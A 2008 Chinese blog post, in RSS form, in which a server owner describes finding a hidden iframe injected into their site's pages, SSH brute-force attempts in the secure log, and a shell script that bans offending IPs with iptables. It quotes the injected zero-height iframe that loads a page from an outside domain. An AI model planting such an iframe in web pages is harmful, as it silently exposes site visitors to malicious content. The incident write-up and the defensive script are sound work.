                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F06%2F23%2Fwget-%25E4%25BD%25BF%25E7%2594%25A8%25E6%258C%2587%25E5%258D%2597%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">wget 使用指南</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F03%2F29%2Fshell%25E4%25B8%258B%25E6%259F%25A5%25E7%259C%258B%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%25E5%25BD%2593%25E5%2589%258D%25E6%2589%2580%25E6%259C%2589%25E8%25BF%259B%25E7%25A8%258B%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">shell下查看服务器当前所有进程</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F04%2F23%2Fwordpress%25E5%25BD%2593%25E5%2589%258D%25E6%259C%2580%25E6%2596%25B0%25E7%2589%2588%25E6%259C%25ACsvn%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">wordpress当前最新版本SVN服务器</font>
                    </a>
                </td>
            </tr>
    
    <tr>
        <td  align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>今天访问自己的一个网站，突然发现第一打开的时候页面上出现了一个黑色的图框，很小的那种，而且网页的css文件也没有加载，刷新后才会加载。于是我查看了网页源代码，这一看吓我一跳，很不幸的事情出现了，我的网站被挂马了，网页开头出现了如下代码：</p>
<div style="border: 1px solid gray; margin: 20px 0px 10px; padding: 4px; overflow: auto; font-size: 8pt; width: 97.5%; cursor: text; max-height: 200px; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<div style="border-style: none; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   1:</span> <span style="color: #0000ff;">&lt;</span><span style="color: #800000;">iframe</span> <span style="color: #ff0000;">src</span>=<span style="color: #ff0000;">http:</span>//<span style="color: #ff0000;">520zuixin</span>.<span style="color: #ff0000;">com</span>/<span style="color: #ff0000;">cn5</span>.<span style="color: #ff0000;">htm</span> <span style="color: #ff0000;">width</span>=<span style="color: #ff0000;">50</span> <span style="color: #ff0000;">height</span>=<span style="color: #ff0000;">0</span><span style="color: #0000ff;">&gt;&lt;/</span><span style="color: #800000;">iframe</span><span style="color: #0000ff;">&gt;</span></pre>
</div>
</div>
<p>马上登录服务器查看该网站代码，没找到异常，这是一件很奇怪的事情。代码是如何被插入到网页开头呢？难道在apache做了手脚？这个问题还没有查清楚，先放下这个问题。去查看服务器的安装记录。</p>
<p>当打开/var/logs/secure文件时，发现了很多利用ssh来暴力破解登录的记录，如下</p>
<div style="border: 1px solid gray; margin: 20px 0px 10px; padding: 4px; overflow: auto; font-size: 8pt; width: 97.5%; cursor: text; max-height: 200px; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<div style="border-style: none; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   1:</span> Aug 29 16:27:23 fgb sshd[31098]: Failed password for root from 189.205.132.145 port 49920 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   2:</span> Aug 29 16:27:28 fgb sshd[31100]: Failed password for root from 189.205.132.145 port 55661 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   3:</span> Aug 29 16:27:33 fgb sshd[31103]: Failed password for root from 189.205.132.145 port 33579 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   4:</span> Aug 29 16:27:37 fgb sshd[31106]: Failed password for root from 189.205.132.145 port 39344 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   5:</span> Aug 29 16:27:42 fgb sshd[31115]: Failed password for root from 189.205.132.145 port 45117 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   6:</span> Aug 29 16:27:46 fgb sshd[31124]: Failed password for root from 189.205.132.145 port 50881 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   7:</span> Aug 29 16:27:52 fgb sshd[31126]: Failed password for root from 189.205.132.145 port 56359 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   8:</span> Aug 29 16:27:57 fgb sshd[31128]: Failed password for root from 189.205.132.145 port 35882 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   9:</span> Aug 29 16:28:02 fgb sshd[31130]: Failed password for root from 189.205.132.145 port 41888 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  10:</span> Aug 29 16:28:08 fgb sshd[31132]: Failed password for root from 189.205.132.145 port 47882 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  11:</span> Aug 29 16:28:12 fgb sshd[31134]: Failed password for root from 189.205.132.145 port 53121 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  12:</span> Aug 29 16:28:17 fgb sshd[31136]: Failed password for root from 189.205.132.145 port 59014 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  13:</span> Aug 29 16:28:21 fgb sshd[31139]: Failed password for root from 189.205.132.145 port 36742 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  14:</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  15:</span> Aug 29 17:24:13 fgb sshd[32749]: Did not receive identification string from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  16:</span> Aug 29 17:28:50 fgb sshd[432]: Illegal user admin from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  17:</span> Aug 29 17:28:57 fgb sshd[450]: Failed password for root from 220.231.81.140 port 59843 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  18:</span> Aug 29 17:29:04 fgb sshd[452]: Illegal user stud from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  19:</span> Aug 29 17:29:11 fgb sshd[454]: Illegal user trash from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  20:</span> Aug 29 17:29:17 fgb sshd[457]: Illegal user gt05 from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  21:</span> Aug 29 17:29:22 fgb sshd[463]: Illegal user william from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  22:</span> Aug 29 17:29:26 fgb sshd[465]: Illegal user stephanie from 220.231.81.140</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  23:</span> Aug 29 17:29:37 fgb sshd[468]: Failed password for root from 220.231.81.140 port 60795 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  24:</span> Aug 29 17:29:48 fgb sshd[471]: Failed password for root from 220.231.81.140 port 61017 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  25:</span> Aug 29 18:16:24 fgb sshd[1638]: warning: can't get client address: Connection reset by peer</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  26:</span> Aug 29 18:16:24 fgb sshd[1638]: Could not write ident string to 219.142.141.194</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  27:</span> Aug 29 18:16:29 fgb sshd[1639]: Accepted password for root from 219.142.141.194 port 30436 ssh2</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  28:</span> Aug 29 18:16:37 fgb sshd[2650]: Received signal 15; terminating.</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  29:</span> Aug 29 18:19:07 fgb sshd[2643]: Server listening on 0.0.0.0 port 22.</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  30:</span> Aug 29 18:19:31 fgb sshd[2712]: Accepted password for root from 219.142.141.194 port 30477 ssh2</pre>
</div>
</div>
<p>类似这样子的记录很多，看来有很多垃圾的人在破解我的服务器密码！现在垃圾和无聊的家伙还真多啊！我都懒的骂你们了！有本事去搞美国、去搞日本、去搞法国，在国内捣乱算什么东西！</p>
<p>骂归骂，但是还是要想办法制止密码被破解，后来在网站找到了一段代码，这段代码如下：</p>
<div style="border: 1px solid gray; margin: 20px 0px 10px; padding: 4px; overflow: auto; font-size: 8pt; width: 97.5%; cursor: text; max-height: 200px; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<div style="border-style: none; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   1:</span> #!/bin/sh</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   2:</span> SCANIP=`grep <span style="color: #006080;">"Failed"</span> /var/log/secure | awk <span style="color: #006080;">'{print $(NF-3)}'</span> |sort|uniq -c|awk <span style="color: #006080;">'{print $1"="$2;}'</span>`</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   3:</span> <span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span> $SCANIP</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   4:</span> <span style="color: #0000ff;">do</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   5:</span> NUMBER=`echo $i|awk -F= <span style="color: #006080;">'{print $1}'</span>`</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   6:</span> SCANIP=`echo $i|awk -F= <span style="color: #006080;">'{print $2}'</span>`</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   7:</span> echo <span style="color: #006080;">"$NUMBER($SCANIP)"</span></pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   8:</span> <span style="color: #0000ff;">if</span> [ $NUMBER -gt 10 ] &amp;&amp; [ -z <span style="color: #006080;">"`iptables -vnL INPUT|grep $SCANIP`"</span> ]</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   9:</span> then</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  10:</span> /sbin/iptables -I INPUT -s $SCANIP -m state --state NEW,RELATED,ESTABLISHED -j DROP</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  11:</span> echo <span style="color: #006080;">"`date` $SCANIP($NUMBER)"</span> &gt;&gt; /var/log/scanip.log</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">  12:</span> fi</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">  13:</span> done</pre>
</div>
</div>
<p>这段代码作用是：扫描secure安全日志文件，发现超过10次非法链接的ip，将其列入iptable防火墙禁止列表，并保存在记录文件中。将这段代码进行定时执行，就可以防止暴力破解的问题。经过这段代码首次扫描后，得到了如下的非法ip记录，这些ip已经被ban了！看这个结果就知道了有个垃圾ip居然非法扫描了我5000多次！</p>
<div style="border: 1px solid gray; margin: 20px 0px 10px; padding: 4px; overflow: auto; font-size: 8pt; width: 97.5%; cursor: text; max-height: 200px; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<div style="border-style: none; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;">
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   1:</span> 六  8月 30 13:50:55 CST 2008 123.30.0.68(52)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   2:</span> 六  8月 30 13:50:55 CST 2008 189.205.132.145(324)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   3:</span> 六  8月 30 13:50:54 CST 2008 201.6.150.22(41)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   4:</span> 六  8月 30 13:50:54 CST 2008 202.102.144.8(13)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   5:</span> 六  8月 30 13:50:55 CST 2008 219.238.183.30(162)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: #f4f4f4;"><span style="color: #606060;">   6:</span> 六  8月 30 13:50:54 CST 2008 222.174.167.162(5058)</pre>
<pre style="border-style: none; margin: 0em; padding: 0px; overflow: visible; font-size: 8pt; width: 100%; color: black; line-height: 12pt; font-family: consolas,'Courier New',courier,monospace; background-color: white;"><span style="color: #606060;">   7:</span> 六  8月 30 13:50:54 CST 2008 61.139.209.141(40)</pre>
</div>
</div>
<p>关于被挂的那段代码怎么插入到我的网站，我继续研究一下，有了结果会记录在这里的！<br />
<h3 class="bsuite_related">Related items</h3>
<ul class="bsuite_related">
<li><a href='http://www.pkphp.com/2011/04/07/centos-iftop/'>centOS带宽实时流量查看工具</a></li>
<li><a href='http://www.pkphp.com/2008/10/06/svn-authentication-realm/'>svn错误：Authentication realm 解决办法</a></li>
<li><a href='http://www.pkphp.com/2008/09/10/%e4%bb%8a%e6%97%a5%e5%88%b0%e5%8d%97%e4%ba%ac%e4%b8%8a%e7%bd%91%ef%bc%8c%e5%8f%91%e7%8e%b0ff%e5%81%b6%e5%b0%94%e6%89%93%e5%bc%80%e7%9a%84%e7%bd%91%e9%a1%b5%e5%87%ba%e7%8e%b0%e5%a6%82%e4%b8%8b%e4%bb%a3/'>今日到南京上网，发现偶尔打开的网页出现如下代码</a></li>
<li><a href='http://www.pkphp.com/2008/08/30/linux%e4%b8%8b%e7%9a%84%e8%84%9a%e6%9c%ac%e6%96%87%e4%bb%b6%e8%a6%81%e6%b3%a8%e6%84%8f%e6%8d%a2%e8%a1%8c%e7%ac%a6%e4%b8%8ewindows%e4%b8%8d%e5%90%8c%ef%bc%81/'>linux下的脚本文件要注意换行符与Windows不同！</a></li>
<li><a href='http://www.pkphp.com/2008/08/11/ubuntu%e4%b8%8b%e5%ae%89%e8%a3%85-apachephpmysql%e6%96%87%e6%9c%ac%e6%9c%8d%e5%8a%a1%e5%99%a8%ef%bc%81/'>Ubuntu下安装 apache+php+mysql文本服务器！</a></li>
</ul>
<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="服务器怎样防止暴力破解" style="font-size: 13px;">服务器怎样防止暴力破解</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="220.231.81.140" style="font-size: 13px;">220.231.81.140</a>(2)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="php破解密码" style="font-size: 13px;">php破解密码</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="iptables 如何防止病毒" style="font-size: 13px;">iptables 如何防止病毒</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="防止利用SSH攻击 办法" style="font-size: 13px;">防止利用SSH攻击 办法</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="php密码暴力破解" style="font-size: 13px;">php密码暴力破解</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="61.139.209.141" style="font-size: 13px;">61.139.209.141</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="Failed password for from port ssh2" style="font-size: 13px;">Failed password for from port ssh2</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="ssh破解密码" style="font-size: 13px;">ssh破解密码</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="PHP 记录 IP" style="font-size: 13px;">PHP 记录 IP</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="sshd 暴力破解保护" style="font-size: 13px;">sshd 暴力破解保护</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="php网站 密码破解" style="font-size: 13px;">php网站 密码破解</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="ssh 怎样 暴力破解密码" style="font-size: 13px;">ssh 怎样 暴力破解密码</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="ssh 破解" style="font-size: 13px;">ssh 破解</a>(1)<a href="http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/" title="求暴力破解PHP网页" style="font-size: 13px;">求暴力破解PHP网页</a>(1)<br /><table class="wumii-related-items" cellspacing="0" cellpadding="2" border="0" width="100%" style="clear: both;">
    
    <tr>
        <td ><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;">您可能也喜欢：</font></b></td>
    </tr>
    
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F11%2Fubuntu%25E4%25B8%258B%25E5%25AE%2589%25E8%25A3%2585-apachephpmysql%25E6%2596%2587%25E6%259C%25AC%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%25EF%25BC%2581%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">Ubuntu下安装 apache+php+mysql文本服务器！</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F06%2F23%2Fwget-%25E4%25BD%25BF%25E7%2594%25A8%25E6%258C%2587%25E5%258D%2597%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">wget 使用指南</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F03%2F29%2Fshell%25E4%25B8%258B%25E6%259F%25A5%25E7%259C%258B%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%25E5%25BD%2593%25E5%2589%258D%25E6%2589%2580%25E6%259C%2589%25E8%25BF%259B%25E7%25A8%258B%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">shell下查看服务器当前所有进程</font>
                    </a>
                </td>
            </tr>
            <tr>
                <td style="margin: 0 !important; padding: 0 !important; line-height: 20px !important;">
                    <img border="0" src="http://static.wumii.com/images/widget/widget_solidPoint.gif">
                    <a target="_blank" style="text-decoration: none !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.pkphp.com%2F2008%2F04%2F23%2Fwordpress%25E5%25BD%2593%25E5%2589%258D%25E6%259C%2580%25E6%2596%25B0%25E7%2589%2588%25E6%259C%25ACsvn%25E6%259C%258D%25E5%258A%25A1%25E5%2599%25A8%2F&from=http%3A%2F%2Fwww.pkphp.com%2F2008%2F08%2F30%2F520zuixin-com-linux-secure-iptables%2F" rel="nofollow">
                        <font size="-1" color="#333333" style="line-height: 1.65em; font-size: 12px !important;">wordpress当前最新版本SVN服务器</font>
                    </a>
                </td>
            </tr>
    
    <tr>
        <td  align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件" rel="nofollow">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.pkphp.com/2008/08/30/520zuixin-com-linux-secure-iptables/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

